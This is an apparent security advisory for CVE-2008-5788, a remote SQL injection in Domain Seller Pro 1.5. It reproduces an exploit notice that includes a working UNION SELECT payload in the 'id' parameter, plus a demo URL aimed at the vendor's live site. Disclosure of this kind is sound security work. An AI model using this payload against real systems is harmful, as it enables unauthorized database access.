Topic : | Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability
|
SecurityAlert : 4833
CVE : CVE-2008-5788
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : TR-ShaRk
Published : 02.01.2009
Affected Software : | domainsellerpro:domain_seller_pro:1.5 |
 Advisory Content : #################WwW.StarHack.Us#####################
#
# Author : TR-ShaRk
#
######################
#
# Web : StarHack.Us OldKral.Com
#
######################
#
# Email : Admin@tr-shark.org
# Msn : Starhack@tr-shark.org
#
######################
#
# Script : Domain Seller Pro� v1.5
#
######################
#
# SQL Injection Vuln. :
#
#
index.php?a=d&id=-4+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
#
######################
#
# Demo :
http://www.domainsellerpro.com/demo/index.php?a=d&id=-4+union+select+1,2,@@
version,4,5,6,7,8,9,10,11,12,13,14--
#
#
#
#################WwW.StarHack.Us########################
Greetz: FataliSt,Webloader,JaCKaL,By-Reis,AranelWorM,RealWolker,DesTRoyeR
References :
http://securityreason.com/expldownload/1/5078/1 (Exploit)
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|